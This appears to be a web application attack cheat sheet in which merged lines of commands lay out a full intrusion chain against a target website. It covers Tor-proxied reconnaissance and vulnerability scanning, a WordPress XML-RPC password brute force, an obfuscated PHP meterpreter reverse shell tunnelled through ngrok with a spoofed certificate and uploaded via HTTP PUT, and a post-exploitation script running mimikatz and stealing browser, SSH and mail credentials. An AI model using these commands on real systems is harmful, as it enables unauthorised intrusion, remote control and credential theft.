App Platform Configuration
Check List
Methodology
TOR Technique for Finding Sensitive Routes
Using the following command that works with the TOR tool, it creates 20 independent Tor proxies (SOCKS + control) for the debian-tor user and places them behind Privoxy so programs can use them. And it makes it easier for an attacker to send requests to the server
Using the next command, we scan the web server to find out what features it has and get a list of the web server's features
Then, using the following commands, we get a list of target subdomains and then using the HTTPX tool command, we check whether the subdomains we got are active
And we can use the next command to find out the open ports of all active subdomains
Using the Katana tool command, we crawl all pages and find the target points and files
Using the Katana tool command, we crawl all the pages and find the target points and files, and then we run it using the Grep command to find and show us if there is a sensitive file in our crawl output
And then using the Dirsearch tool command, which we run on all the subdomains that are hit, to find all the sensitive paths or even sensitive files that could expose information about users or the web server
Using the Nuclei command, we can find vulnerabilities and CVEs on the target to identify the presence of vulnerabilities, and using the next commands, we can run commands related to the target's use of different CMSs on the target
Cheat Sheet
Sample And Known Files And Directories
multitor --init 20 \
--user debian-tor \
--socks-port 9000 \
--control-port 9900 \
--proxy privoxynikto -h $WEBSITEsubfinder -d $WEBSITE -o /tmp/subdomains.txtecho "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
-l /tmp/subdomains.txt \
-r /tmp/resolvers.txt \
-mode resolve \
-o /tmp/alive-subdomains.txtcat /tmp/sub-domains.txt | \
httpx -silent -sc -probe -title -td -ip \
-mc 200,404,403,302,301,303,304,305,306,307,302 \
-o /tmp/sub-domains.txthttpx-toolkit -l /tmp/alive-subdomains.txt \
-ports 80,443,8080,8000,8888,8082,8083 \
-o /tmp/alive-sub-and-ports.txtkatana -u /tmp/alive-subdomains.txt \
-d 5 -ps \
-pss waybackarchive,commoncrawl,alienvault \
-kf -jc -fx \
-ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg \
-o /tmp/all-urls.txtcat /tmp/all-urls.txt | \
grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'dirsearch -l /tmp/sub-domains.txt \
-t 150 -x 403,404,500,429 -i 200,301,302
--random-agent nuclei -tglnuclei -u $WEBSITE -tags osint enum reconnuclei -u $WEBSITE -tags cves detect vulnerabilitiesnuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panelnuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserializationwpscan --url $WEBSITE --rua --api-token $TOKENwpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, mwpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, pwpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, twpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, ttjoomscan -u $WEBSITE --random-agentjoomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379joomscan -u $WEBSITE --random-agent -ecdroopescan scan drupal -u $WEBSITEdroopescan scan drupal -u $WEBSITE --enumerate adrupwn --mode exploit --target $WEBSITEdrupwn --mode enum --modules --target $WEBSITEdrupwn --mode enum --users --target $WEBSITEspartan -u $WEBSITE --sps --users -siis_shortname_scanner 2 20 $WEBSITEComment Review
katana -u $WEBSITE katana -u $WEBSITE | grep "\.js$"katana -u $WEBSITE | grep "\.css*"System Configuration
lynishardentools-cli.exeConfiguration Review
nmap -sS -sV --mtu 5000 --script http-methods $WEBSITEmsfconsole -qx "
use auxiliary/scanner/http/wordpress_pingback_access;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
run;
exit"msfconsole -qx "
use scanner/http/wordpress_xmlrpc_login;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set USERNAME admin;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
set THREADS 10;
set STOP_ON_SUCCESS true;
set Proxies socks4:127.0.0.1:16379;
run;
exit"msfconsole -qx "
use auxiliary/scanner/http/http_put;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set PATH /wp-content/uploads;
run -j"ngrok tcp 4444 >/dev/null 2>&1 &NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOFmsfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
HandlerSSLCert=$CERT \
StagerVerifySSLCert=true \
PayloadUUIDTracking=true \
PayloadUUIDName=StagedPHP \
EnableStageEncoding=true \
-f raw \
-e php/base64 \
-i 3 \
-o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.phpmsfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.phpLogging
commix -u $WEBSITELast updated